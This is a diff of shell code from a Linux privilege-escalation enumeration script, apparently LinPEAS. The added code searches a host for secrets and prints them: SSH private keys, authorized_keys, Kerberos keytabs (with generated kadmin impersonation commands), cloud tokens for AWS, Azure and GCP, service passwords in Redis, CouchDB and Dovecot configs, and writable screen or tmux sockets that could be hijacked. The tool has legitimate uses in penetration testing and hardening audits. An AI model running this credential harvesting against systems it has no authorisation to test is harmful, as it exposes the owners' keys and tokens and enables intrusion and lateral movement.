+if [ "$PSTORAGE_LOG4SHELL" ] || [ "$DEBUG" ]; then
+ print_2title "Searching Log4Shell vulnerable libraries"
+ printf "%s\n" "$PSTORAGE_LOG4SHELL" | while read f; do
+ echo "$f" | grep -E "log4j\-core\-(1\.[^0]|2\.[0-9][^0-9]|2\.1[0-6])" | sed -${E} "s,log4j\-core\-(1\.[^0]|2\.[0-9][^0-9]|2\.1[0-6]),${SED_RED},";
+ done
+ echo ""
+fi
+
+#-- SI) ssh files
+print_2title "Searching ssl/ssh files"
+if [ "$PSTORAGE_CERTSB4" ]; then certsb4_grep=$(grep -L "\"\|'\|(" $PSTORAGE_CERTSB4 2>/dev/null); fi
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+ sshconfig="$(ls /etc/ssh/ssh_config 2>/dev/null)"
+ hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)"
+ hostsallow="$(ls /etc/hosts.allow 2>/dev/null)"
+ writable_agents=$(find /tmp /etc /home -type s -name "agent.*" -or -name "*gpg-agent*" '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)
+fi
+
+if [ "$PSTORAGE_SSH" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing SSH Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"id_dsa.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "id_dsa*"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "id_dsa.*$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,id_dsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"id_rsa.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "id_rsa*"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "id_rsa.*$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,id_rsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"known_hosts$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "known_hosts"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "known_hosts$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,known_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"authorized_hosts$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "authorized_hosts"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "authorized_hosts$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,authorized_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"authorized_keys$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "authorized_keys"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "authorized_keys$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,authorized_keys$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,from=[\w\._\-]+,${SED_GOOD},g"; done; echo "";
+fi
+
+
+grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED},"
+
+if [ "$TIMEOUT" ]; then
+ privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null)
+ privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null)
+ privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null)
+ privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null)
+else
+ privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout
+ privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null)
+fi
+
+if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then
+ echo ""
+ print_3title "Possible private SSH keys were found!" | sed -${E} "s,private SSH keys,${SED_RED},"
+ if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -${E} "s,.*,${SED_RED},"; fi
+ if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -${E} "s,.*,${SED_RED},"; fi
+ if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -${E} "s,.*,${SED_RED},"; fi
+ if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -${E} "s,.*,${SED_RED},"; fi
+ echo ""
+fi
+if [ "$certsb4_grep" ] || [ "$PSTORAGE_CERTSBIN" ]; then
+ print_3title "Some certificates were found (out limited):"
+ printf "$certsb4_grep\n" | head -n 20
+ printf "$$PSTORAGE_CERTSBIN\n" | head -n 20
+ echo ""
+fi
+if [ "$PSTORAGE_CERTSCLIENT" ]; then
+ print_3title "Some client certificates were found:"
+ printf "$PSTORAGE_CERTSCLIENT\n"
+ echo ""
+fi
+if [ "$PSTORAGE_SSH_AGENTS" ]; then
+ print_3title "Some SSH Agent files were found:"
+ printf "$PSTORAGE_SSH_AGENTS\n"
+ echo ""
+fi
+if ssh-add -l 2>/dev/null | grep -qv 'no identities'; then
+ print_3title "Listing SSH Agents"
+ ssh-add -l
+ echo ""
+fi
+if gpg-connect-agent "keyinfo --list" /bye | grep "D - - 1"; then
+ print_3title "Listing gpg keys cached in gpg-agent"
+ gpg-connect-agent "keyinfo --list" /bye
+ echo ""
+fi
+if [ "$writable_agents" ]; then
+ print_3title "Writable ssh and gpg agents"
+ printf "%s\n" "$writable_agents"
+fi
+if [ "$PSTORAGE_SSH_CONFIG" ]; then
+ print_3title "Some home ssh config file was found"
+ printf "%s\n" "$PSTORAGE_SSH_CONFIG" | while read f; do ls "$f" | sed -${E} "s,$f,${SED_RED},"; cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,User|ProxyCommand,${SED_RED},"; done
+ echo ""
+fi
+if [ "$hostsdenied" ]; then
+ print_3title "/etc/hosts.denied file found, read the rules:"
+ printf "$hostsdenied\n"
+ cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN},"
+ echo ""
+fi
+if [ "$hostsallow" ]; then
+ print_3title "/etc/hosts.allow file found, trying to read the rules:"
+ printf "$hostsallow\n"
+ cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED},"
+ echo ""
+fi
+if [ "$sshconfig" ]; then
+ echo ""
+ echo "Searching inside /etc/ssh/ssh_config for interesting info"
+ grep -v "^#" /etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED},"
+fi
+echo ""
+
+if [ "$PSTORAGE_PAM_AUTH" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing PAM Auth Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_PAM_AUTH\" | grep -E \"pam\.d$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pam.d"; fi; fi; printf "%s" "$PSTORAGE_PAM_AUTH" | grep -E "pam\.d$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,pam\.d$,${SED_RED},"; find "$f" -name "sshd" | while read ff; do ls -ld "$ff" | sed -${E} "s,sshd,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E -i "auth" | grep -Ev "^#|^@" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo "";
+fi
+
+
+#-- SI) Passwords inside pam.d
+pamdpass=$(grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#")
+if [ "$pamdpass" ] || [ "$DEBUG" ]; then
+ print_2title "Passwords inside pam.d"
+ grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED},"
+ echo ""
+fi
+
+if [ "$PSTORAGE_NFS_EXPORTS" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing NFS Exports Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_NFS_EXPORTS\" | grep -E \"exports$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "exports"; fi; fi; printf "%s" "$PSTORAGE_NFS_EXPORTS" | grep -E "exports$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,exports$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,insecure,${SED_RED},g" | sed -${E} "s,no_root_squash|no_all_squash,${SED_RED_YELLOW},g"; done; echo "";
+fi
+
+
+#-- SI) Kerberos
+kadmin_exists="$(command -v kadmin)"
+klist_exists="$(command -v klist)"
+if [ "$kadmin_exists" ] || [ "$klist_exists" ] || [ "$PSTORAGE_KERBEROS" ] || [ "$DEBUG" ]; then
+ print_2title "Searching kerberos conf files and tickets"
+ print_info "http://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-active-directory"
+
+ if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${SED_RED},"; fi
+ if [ "$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist; fi
+ ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)"
+ if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0), you might find tickets inside processes memory" | sed "s,is disabled,${SED_RED},g";
+ else echo "ptrace protection is enabled ($ptrace_scope), you need to disable it to search for tickets inside processes memory" | sed "s,is enabled,${SED_GREEN},g";
+ fi
+
+ printf "%s\n" "$PSTORAGE_KERBEROS" | while read f; do
+ if [ -r "$f" ]; then
+ if echo "$f" | grep -q .k5login; then
+ echo ".k5login file (users with access to the user who has this file in his home)"
+ cat "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g"
+ elif echo "$f" | grep -q keytab; then
+ echo ""
+ echo "keytab file found, you may be able to impersonate some kerberos principals and add users or modify passwords"
+ klist -k "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g"
+ printf "$(klist -k $f 2>/dev/null)\n" | awk '{print $2}' | while read l; do
+ if [ "$l" ] && echo "$l" | grep -q "@"; then
+ printf "$ITALIC --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"\n" | sed -${E} "s,$l,${SED_RED},g"
+ #kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid
+ #We could also try to create a new user or modify a password, but I'm not user if linpeas should do that
+ fi
+ done
+ elif echo "$f" | grep -q krb5.conf; then
+ ls -l "$f"
+ cat "$f" 2>/dev/null | sed -${E} "s,default_ccache_name,${SED_RED},";
+ elif echo "$f" | grep -q kadm5.acl; then
+ ls -l "$f"
+ cat "$f" 2>/dev/null
+ elif echo "$f" | grep -q sssd.conf; then
+ ls -l "$f"
+ cat "$f" 2>/dev/null | sed -${E} "s,cache_credentials ?= ?[tT][rR][uU][eE],${SED_RED},";
+ elif echo "$f" | grep -q secrets.ldb; then
+ echo "You could use SSSDKCMExtractor to extract the tickets stored here" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},";
+ ls -l "$f"
+ elif echo "$f" | grep -q .secrets.mkey; then
+ echo "This is the secrets file to use with SSSDKCMExtractor" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},";
+ ls -l "$f"
+ fi
+ fi
+ done
+ ls -l "/tmp/krb5cc*" "/var/lib/sss/db/ccache_*" "/etc/opt/quest/vas/host.keytab" 2>/dev/null || echo_not_found "tickets kerberos"
+ klist 2>/dev/null || echo_not_found "klist"
+ echo ""
+
+fi
+
+if [ "$PSTORAGE_KNOCKD" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Knockd Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_KNOCKD\" | grep -E \"knockd.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*knockd*"; fi; fi; printf "%s" "$PSTORAGE_KNOCKD" | grep -E "knockd.*$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,knockd.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_KIBANA" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Kibana Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_KIBANA\" | grep -E \"kibana\.y.*ml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kibana.y*ml"; fi; fi; printf "%s" "$PSTORAGE_KIBANA" | grep -E "kibana\.y.*ml$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,kibana\.y.*ml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#|^[[:space:]]*$" | sed -${E} "s,username|password|host|port|elasticsearch|ssl,${SED_RED},g"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_ELASTICSEARCH" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Elasticsearch Files (limit 70)"
+ echo "The version is $(curl -X GET '127.0.0.1:9200' 2>/dev/null | grep number | cut -d ':' -f 2)"
+ if ! [ "`echo \"$PSTORAGE_ELASTICSEARCH\" | grep -E \"elasticsearch\.y.*ml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "elasticsearch.y*ml"; fi; fi; printf "%s" "$PSTORAGE_ELASTICSEARCH" | grep -E "elasticsearch\.y.*ml$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,elasticsearch\.y.*ml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "path.data|path.logs|cluster.name|node.name|network.host|discovery.zen.ping.unicast.hosts" | grep -Ev "\W+\#|^#"; done; echo "";
+fi
+
+
+##-- SI) Logstash
+if [ "$PSTORAGE_LOGSTASH" ] || [ "$DEBUG" ]; then
+ print_2title "Searching logstash files"
+ printf "$PSTORAGE_LOGSTASH"
+ printf "%s\n" "$PSTORAGE_LOGSTASH" | while read d; do
+ if [ -r "$d/startup.options" ]; then
+ echo "Logstash is running as user:"
+ cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed -${E} "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,root,${SED_RED},"
+ fi
+ cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -${E} "s,exec\W*\{|command\W*=>,${SED_RED},"
+ cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E} "s,path\W*=>|code\W*=>|ruby\W*\{,${SED_RED},"
+ done
+fi
+echo ""
+
+#-- SI) Vault-ssh
+if [ "$PSTORAGE_VAULT_SSH_HELPER" ] || [ "$DEBUG" ]; then
+ print_2title "Searching Vault-ssh files"
+ printf "$PSTORAGE_VAULT_SSH_HELPER\n"
+ printf "%s\n" "$PSTORAGE_VAULT_SSH_HELPER" | while read f; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done
+ echo ""
+ vault secrets list 2>/dev/null
+ printf "%s\n" "$PSTORAGE_VAULT_SSH_TOKEN" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null
+fi
+echo ""
+
+#-- SI) Cached AD Hashes
+adhashes=$(ls "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null)
+if [ "$adhashes" ] || [ "$DEBUG" ]; then
+ print_2title "Searching AD cached hashes"
+ ls -l "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null
+ echo ""
+fi
+
+#-- SI) Screen sessions
+if ([ "$screensess" ] || [ "$screensess2" ] || [ "$DEBUG" ]) && ! [ "$SEARCH_IN_FOLDER" ]; then
+ print_2title "Searching screen sessions"
+ print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-shell-sessions"
+ screensess=$(screen -ls 2>/dev/null)
+ screensess2=$(find /run/screen -type d -path "/run/screen/S-*" 2>/dev/null)
+
+ screen -v
+ printf "$screensess\n$screensess2" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m,"
+
+ find /run/screen -type s -path "/run/screen/S-*" -not -user $USER '(' '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null | while read f; do
+ echo "Other user screen socket is writable: $f" | sed "s,$f,${SED_RED_YELLOW},"
+ done
+ echo ""
+fi
+
+#-- SI) Tmux sessions
+tmuxdefsess=$(tmux ls 2>/dev/null)
+tmuxnondefsess=$(ps auxwww | grep "tmux " | grep -v grep)
+tmuxsess2=$(find /tmp -type d -path "/tmp/tmux-*" 2>/dev/null)
+if ([ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ] || [ "$tmuxsess2" ] || [ "$DEBUG" ]) && ! [ "$SEARCH_IN_FOLDER" ]; then
+ print_2title "Searching tmux sessions"$N
+ print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-shell-sessions"
+ tmux -V
+ printf "$tmuxdefsess\n$tmuxnondefsess\n$tmuxsess2" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m,"
+
+ find /tmp -type s -path "/tmp/tmux*" -not -user $USER '(' '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null | while read f; do
+ echo "Other user tmux socket is writable: $f" | sed "s,$f,${SED_RED_YELLOW},"
+ done
+ echo ""
+fi
+
+if [ "$PSTORAGE_COUCHDB" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing CouchDB Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_COUCHDB\" | grep -E \"couchdb$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "couchdb"; fi; fi; printf "%s" "$PSTORAGE_COUCHDB" | grep -E "couchdb$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,couchdb$,${SED_RED},"; find "$f" -name "local.ini" | while read ff; do ls -ld "$ff" | sed -${E} "s,local.ini,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E} "s,admin.*|password.*|cert_file.*|key_file.*|hashed.*|pbkdf2.*,${SED_RED},g"; done; echo "";done; echo "";
+fi
+
+
+if [ "$PSTORAGE_REDIS" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Redis Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_REDIS\" | grep -E \"redis\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "redis.conf"; fi; fi; printf "%s" "$PSTORAGE_REDIS" | grep -E "redis\.conf$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,redis\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,masterauth.*|requirepass.*,${SED_RED},g"; done; echo "";
+fi
+
+
+#-- SI) Dovecot
+# Needs testing
+dovecotpass=$(grep -r "PLAIN" /etc/dovecot 2>/dev/null)
+if [ "$dovecotpass" ] || [ "$DEBUG" ]; then
+ print_2title "Searching dovecot files"
+ if [ -z "$dovecotpass" ]; then
+ echo_not_found "dovecot credentials"
+ else
+ printf "%s\n" "$dovecotpass" | while read d; do
+ df=$(echo $d |cut -d ':' -f1)
+ dp=$(echo $d |cut -d ':' -f2-)
+ echo "Found possible PLAIN text creds in $df"
+ echo "$dp" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null
+ done
+ fi
+ echo ""
+fi
+
+if [ "$PSTORAGE_MOSQUITTO" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Mosquitto Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_MOSQUITTO\" | grep -E \"mosquitto\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "mosquitto.conf"; fi; fi; printf "%s" "$PSTORAGE_MOSQUITTO" | grep -E "mosquitto\.conf$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,mosquitto\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,password_file.*|psk_file.*|allow_anonymous.*true|auth,${SED_RED},g"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_NEO4J" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Neo4j Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_NEO4J\" | grep -E \"neo4j$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "neo4j"; fi; fi; printf "%s" "$PSTORAGE_NEO4J" | grep -E "neo4j$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,neo4j$,${SED_RED},"; find "$f" -name "auth" | while read ff; do ls -ld "$ff" | sed -${E} "s,auth,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo "";
+fi
+
+
+AWSVAULT="$(command -v aws-vault 2>/dev/null)"
+if [ "$AWSVAULT" ] || [ "$DEBUG" ]; then
+ print_2title "Check aws-vault"
+ aws-vault list
+fi
+
+if [ "$PSTORAGE_CLOUD_CREDENTIALS" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Cloud Credentials Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"credentials\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "credentials.db"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "credentials\.db$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"legacy_credentials\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "legacy_credentials.db"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "legacy_credentials\.db$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,legacy_credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"access_tokens\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "access_tokens.db"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "access_tokens\.db$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,access_tokens\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"access_tokens\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "access_tokens.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "access_tokens\.json$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,access_tokens\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"accessTokens\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "accessTokens.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "accessTokens\.json$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,accessTokens\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"azureProfile\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "azureProfile.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "azureProfile\.json$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,azureProfile\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"TokenCache\.dat$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "TokenCache.dat"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "TokenCache\.dat$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,TokenCache\.dat$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"AzureRMContext\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "AzureRMContext.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "AzureRMContext\.json$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,AzureRMContext\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"\.bluemix$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".bluemix"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "\.bluemix$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.bluemix$,${SED_RED},"; find "$f" -name "config.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo "";
+fi
+
+
+if [ "$PSTORAGE_CLOUD_INIT" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Cloud Init Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_CLOUD_INIT\" | grep -E \"cloud\.cfg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "cloud.cfg"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_INIT" | grep -E "cloud\.cfg$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,cloud\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy" | grep -Ev "\W+\#|^#" | sed -${E} "s,consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy,${SED_RED},g"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_CLOUDFLARE" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing CloudFlare Files (limit 70)"
